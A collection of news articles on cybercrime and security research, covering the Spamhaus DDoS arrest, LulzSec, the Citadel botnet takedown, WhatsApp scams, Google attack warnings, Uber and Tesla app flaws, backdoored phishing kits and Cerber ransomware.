London teenager arrested over huge cyberattack

Cyber crime police have arrested and bailed a 16-year-old from London in connection with a huge alleged cyberattack which is said to have affected the internet globally, it has been revealed.

According to the Evening Standard, police said they arrested the boy in April after “significant sums of money” were found to be “flowing through his bank account”.

The boy, who lives in south-west London, has not been identified, and was bailed until later this year. Detectives at the National Cyber Crime Unit were acting in concert with police from around the world in a swoop against a gang of suspected cybercriminals. A Dutch man, 35 years old and living in Spain, was also arrested at the time.

The attack in question was allegedly a distributed denial of service (DDoS) attack against the Dutch anti-spam group Spamhaus. A DDoS attack involves a programme repeatedly trying to access a website from various computers, to make it unavailable to its intended users.

The Standard cites a briefing document on the UK operation, describing the attack as “largest DDoS attack ever seen,” which had a “worldwide impact” on internet exchanges.

It said the attack caused “worldwide disruption of the functionality” of the internet.

It continues: “The suspect was found with his computer systems open and logged on to various virtual systems and forums. The subject has a significant amount of money flowing through his bank account. Financial investigators are in the process of restraining monies.”

By James Legge


LulzSec leader named as Matthew Flannery faces 12 years in jail after arrest in Australia

The self-proclaimed leader of the “hacktivist” group LulzSec has been arrested and charged with hacking into government websites, Australian police have said.

The arrest comes as four LulzSec members in Britain face jail after admitting to a series of online attacks.

The identity of the 24-year-old has not yet been officially released but reports in the Australian press named him as Matthew Flannery, who allegedly used the online name “Aush0k”. He was arrested in the coastal town of Point Clare, around 50 miles north of Sydney and faces up to twelve years in prison after being charged with two counts of hacking into computers.

His arrest is another blow to the high-profile Anonymous splinter group, which was responsible for attacks on the CIA, the UK’s Serious Organised Crime Agency and News International.

LulzSec was compromised when its former de facto leader Hector Xavier Monsegur, who went by the moniker “Sabu” online, turned informant after his own arrest and spent around nine months working for the US authorities.

But other members of the hacktivist community mocked the description of the man as a “leader” of the group last night, with some claiming never to have encountered the username on the online chatrooms they use.

Australian Federal Police said they began their investigation into the man, who works in IT, earlier this month when their Cyber Crime Operations team found a “compromise to a government website”. Officers said he held a position of trust with the IT company he worked for and used it to access to sensitive information from clients including government agencies.

In a statement, police said. “The AFP [Australian Federal Police] believes the man’s knowledge and skills presented a significant risk to the clients of the company for which he was employed had he continued his illegal online activities.”

Cyber Crime Operations Commander Glen McEwen said the impairment or disruption of communications to or from computer networks can have serious consequences. He said: “Those thinking of engaging in such activities should be warned that hacking, creating or propagating malicious viruses or participating in Distributed Denial of Service attacks are not harmless fun,” Commander McEwen said.

“Criminal acts such as this can result in serious long-term consequences for individuals, such as criminal convictions or imprisonment.” Police said the man was bailed to reappear in court on May 15.

Just five days ago, another member of the hacking group was jailed for hacking Sony Pictures Entertainment by a Los Angeles court. Cody Kretsinger, 25, was known online as “Recursion”. He was given a one-year term after pleading guilty last April. He will also be required to carry out 1,000 hours of community service after his release for his part in the hack, which Sony said caused more than $600,000 (£392,000) in damage.

By Kevin Rawlinson


$500 million botnet Citadel attacked by Microsoft and the FBI

Joint operation identified more than 1000 botnets, but operations continue.

A joint strike by Microsoft and the FBI, with aid from authorities in more than 80 countries, has begun breaking up the Citadel network – a cybercrime ring responsible for stealing more than $500 million (£323 million) from bank accounts.

The criminals in charge of the Citadel network installed key logging software on up to five million computers to steal data, recording logins and passwords before emptying individuals’ online accounts.

Banks affected by the group’s activities included American Express, Bank of America, HSBC, Wells Fargo, PayPal, and Royal Bank of Canada.

Microsoft describes the internationally-organised assault as “our most aggressive botnet operation to date”, marking the first time that “law enforcement and the private sector have worked together […] to execute a civil seizure warrant as part of a botnet disruption operation.”

During the attack, codenamed Operation b54, more than 1,000 botnets were shut down over Wednesday, with Microsoft stating that 455 of those were hosted in 40 data centres in the US.

Richard Bosovich of the Digital Crimes Unit has said that those that run the data centres are usually unaware of the botnets: “There is no responsibility on their part to see what is in the pipes,” he said.

The reports by Reuters on the operation do warn that this operation will not extinguish the operations of the Citadel group, but it will “significantly disrupt” their operation.

Citadel’s operations were started after the source code for an infamous cybercrime toolkit named Zeus was released in 2011. The code available from Zeus offered tools for many forms of cybercrime, from keystroke logging to phishing schemes.

The code was then augmented by enthusiasts and opportunists on cybercrime forums, with Citadel’s tweaks to the toolkit hiding it from programs designed to track Zeus originally. Citadel even blocked victims’ access to legitimate anti-virus and anti-malware sites, making it more difficult to remove the malignant software, even if they were alerted to its presence.

Microsoft is also hunting a hacker known by the alias Aquabox, who was named as the ringleader of the operation in a civil lawsuit filed by the company in North Carolina.

Richard Boscovich of the Digital Crimes Unit suspects Aquabox lives in eastern Europe, as the programs operated by the botnet are programmed not to attack institutions in Ukraine or Russia, likely to avoid attracting local attention to the criminals.

Boscovich describes Aquabox’s operation as international in its scope, working with at least 81 “herders” who help to run the botnet from anywhere in the world. He also operated a forum for his subordinates where they could suggest new tweaks to the software, and exchange tips on managing the computers in their charge.

“Like many of our past operations, this investigation once again revealed how criminals are adapting and evolving,” said Bosovich. “Cooperation is the key to winning the fight against cybercrime, and I’m excited about the opportunity we had to work with law enforcement and the other partners involved.”

By James Vincent


Clicking WhatsApp links making users vulnerable to cybercrime

Clicking on the links circulated on instant messaging app may expose and make them vulnerable to cyberattacks

Giving away a warning to all WhatsApp users across the globe, a report said that clicking on the links circulated on instant messaging app may expose and make them vulnerable to cyberattacks. According to a report in The Sun newspaper, hackers are using simple tricks to fool people into visiting booby-trapped websites and then fleecing them.

Recently, Whatsapp rolled out video calling and scammers are taking the advantage of this new feature as bait to tempt people into their trap. Video calling download links shared on WhatsApp messages take users to malicious websites.

“If you receive an email asking you to “activate” the function by visiting a website, make sure you don’t click it. Anyone who is tricked into visiting the danger pages could end up being targeted by digital criminals,” the report pointed out.

Earlier this month, announcing that India now has nearly 160 million monthly active users, WhatsApp launched a video calling feature here which was rolled out globally. The feature is available on all platforms — Android, iOS and Windows. A user does not need to go to any links to download the feature. Your app store will receive an update from WhatsApp with the new feature.

WhatsApp is available in more than 50 different languages around the world and in 10 Indian languages. Nearly 100 million calls are being made on the platform daily worldwide. With the video calling feature, WhatsApp will now compete with Microsoft-owned Skype and Google’s Duo.

Another hoax, which talked about ‘WhatsApp Gold’ that has also been doing the rounds on the popular messaging app gives a link for users to open, claiming that it would offer users access to an exclusive form of the app.



Google Warns Users of Recent State-sponsored Attacks

Google Warns Journalists and Activists About Recent State-Sponsored Attacks

Over the last few days, Google has delivered a batch of warnings about potential government-backed attacks against numerous journalists, academics and activists. Many of the recipients have announced their personal warnings on Twitter. There are some differences in the wording of some of the warnings, but Google has confirmed that the Twitter postings appear to be authentic.

Google has been issuing such warnings since 2012. At first they were simple text alerts across the top of the recipients’ Gmail page. In March of this year it started to use the larger more noticeable banners that are now appearing. The warnings do not indicate that an account has actually been compromised; only that Google researchers have seen indications of an attempt against the account.

The warnings are also not timely. The attack indicators were likely noticed up to a month earlier. Google does not issue immediate warnings for fear that this will allow attackers to determine the method of discovery. This time lapse has led to certain assumptions that the attackers are likely to be the Russian actors, possibly APT28 or APT29, that were linked to attacks against the Democrats, supposedly to influence the election. (Last month, Russian hackers were also linked with targeting journalists investigating the MH17 crash.)

Google State Sponsored Attack Warning

This, however, has to be conjecture. Google does not publicly provide any evidence on the identity of the attackers — and at least one target is a Hong-Kong-based Chinese activist (Joshua Wong Chi-fung).

“Google has been secretive about the algorithms and criteria it uses to determine that a potential attack is state-sponsored,” explains ESET senior research fellow David Harley; adding that such secrecy about proprietary algorithms is not unusual in the security industry. “The relationship with the APT29 targeted malware is speculative, but I can’t say there isn’t a connection. If an attack is based on code that is associated with known state-sponsored attacks, that could be another indicator, if you have that sort of information. Google isn’t exactly known for a spirit of friendly cooperation with the security industry at large, but it certainly has security resources.”

There is, however, an element of hysteria about this current batch of warnings; as if users need to take different precautions against nation attacks than they do against everyday criminal attacks. Activists are more likely to be attacked for political reasons, and in some cases the consequences could be more dire — but the defenses remain the same as those everybody should be using as a matter of course.

“Journalists and professors already know what they should do – and if they don’t, they can easily look it up. If they don’t already follow best practices it’s because they suffer from the fallacy that they aren’t important enough to target,” comments F-Secure’s Sean Sullivan. It is certainly true that users receiving Google warnings should take immediate steps to confirm the integrity of their account: Google doesn’t say the attack was successful, but nor does it say it failed.

Caleb Chen, who works with Private Internet Access, points out that state-sponsored attacks may be more prevalent than is commonly thought. Google says only that it is likely to happen to less than 0.1% of its users. If there are a billion Gmail users, he suggests, those figures mean that up to a million may have seen state-sponsored probing. “As cyber-attacks continue to proliferate, often times across borders, expect reports of this type of probing to rise in the future.”

There is also an irony about warnings being attributed to foreign governments coming at the same time as the US and particularly the UK governments are increasing their own surveillance capabilities. Luis Corrons, technical director at PandaLabs insists there is a difference. “One thing is knowing that governments are harvesting loads of information from everyone, and another thing is an attack targeted at you, so they can compromise your computer and access (steal) all your information, sources, etc.”

Nevertheless, Chen reports a 30% spike in VPN sales from the UK in the week in which the IP Bill completed its course through parliament. While standard computer defenses are required to protect accounts, VPNs are now also required to protect communications — especially those of activists of any persuasion.

Account defenses obviously include strong passwords, 2FA where possible, reputable anti-virus, and an awareness of spear-phishing techniques; but Corrons offers one other piece of advice for journalists and activists: “Ideally have all your sensitive information in a different computer to the one you use for your emails, Internet, etc. Even better if this one is not connected to the Internet.”

By Kevin Townsend


Flaws in Uber’s UberCENTRAL Tool Exposed User Data

Several vulnerabilities have been identified in Uber’s recently launched UberCENTRAL service. The ride-sharing company patched the flaws and rewarded the expert who found them.

Announced in late July, UberCENTRAL provides a dashboard that companies can use to pay for Uber rides on behalf of their customers. UberCENTRAL administrators can add operators (i.e. employees who request rides for customers) based on their email address.

Since the rules of Uber’s bug bounty program specifically mention enumeration issues, bounty hunter Kevin Roh decided to see if such flaws are present in UberCENTRAL. Uber is particularly interested in vulnerabilities that can be used to enumerate users’ universally unique identifiers (UUIDs) via phone numbers or email addresses as these can allow insecure direct object reference (IDOR) attacks.

One of the flaws discovered by Roh allowed attackers to enumerate user UUIDs by sending requests with possible email addresses. If the email address is associated with an account, the response from the server will include the user’s UUID. If the email address is not valid, the response will contain an error.

While the second issue identified by the expert is similar, the third security hole he found could have been exploited to obtain not only UUIDs, but also full names, phone numbers and email addresses.

These issues were reported to Uber in September and October, and they were patched in October. The company awarded Roh hundreds of dollars for each of the vulnerabilities, but the exact amounts have not been disclosed. Roh is one of the top hackers in Uber’s bug bounty program.

The company says it has paid out more than $700,000 so far, with the average bounty ranging between $750 and $1,000. A researcher earned $10,000 this summer after informing Uber of a critical flaw in a third-party WordPress plugin used on the company’s websites.

Researchers from security consulting and audit firm Integrity informed Uber of 14 flaws, including ones that could have allowed attackers to access the details of Uber drivers and passengers.

By Eduard Kovac


Backdoored Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.

By Ionut Arghire


Researchers Hijack Tesla Car by Hacking Mobile App

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

UPDATE. Tesla told SecurityWeek that none of the vulnerabilities used in this attack are specific to the company’s products

“The report and video do not demonstrate any Tesla-specific vulnerabilities,” said a Tesla spokesperson. “This demonstration shows what most people intuitively know – if a phone is hacked, the applications on that phone may no longer be secure. The researchers showed that known social engineering techniques could be employed to trick people into installing malware on their Android devices, compromising their entire phone and all apps, which also includes their Tesla app. Tesla recommends users run the latest version of their mobile operating system.”

By Ionut Arghire


Cerber 5.0 Ransomware Uses New IP Ranges

The cyber criminals behind the notorious Cerber ransomware family have released three new versions of the malware this week, with the most notable change being the addition of new IP ranges in Cerber 5.0.

Initially spotted in early March, Cerber took a different approach to informing users that they have been infected: it included a .vbs file with a VBScript that caused the compromised machine to speak to the victim. Adding the .CERBER extension to encrypted files, the threat was also observed scanning all accessible network shares for files to encrypt.

Used in massive campaigns worldwide, including one targeting Office 365 users, Cerber has seen numerous upgrades since March, with the second major release observed in early August. Available to other cybercriminals via the ransomware-as-a-service model, Cerber was estimated in August to generate $2.3 million in annual revenue.

Cerber 4.0, the latest major variant of the malware, was released about a month and a half ago, roughly one week after the threat was observed killing database processes on the infected machines and just over a month after Cerber 3.0 emerged.

On Thursday, security researchers observed version 5.0 of the ransomware being distributed, less than 24 hours after version 4.1.6 had been released. Several hours later, version 5.0.1 also emerged, showing that the malware’s developers are aggressively updating their software.

While analyzing Ceber 5.0, Check Point security researchers noticed that it uses new IP ranges for the command and control (C&C) communication. One of the IP ranges, however, was observed in version 4.1.6, but the rest of them are brand new, it seems. Just as before, the security researchers explain, the malware broadcasts messages to all IP addresses via UDP.

Other changes in the new variant include the fact that it skips 640 bytes when encrypting a file (compared to 512 bytes before), and that it doesn’t encrypt files smaller than 2,560 bytes (compared to 1,024 bytes before). Moreover, the ransomware now also targets files that feature the .secret extension.

At the moment, the ransomware is being distributed via spam emails and exploit kits, specifically Rig-V exploit kit. As with the previous variants, the malware randomly generates encrypted file extensions using 4 random alphabetic letters.

The malware continues to search for databases and files related to them, and can encrypt various database file types, Check Point says. The malware drops a ransom note on the desktop to inform users on the infection, and also drops an interactive .hta file with information in different languages. The rest of the features are unchanged from the previous releases.

By Ionut Arghire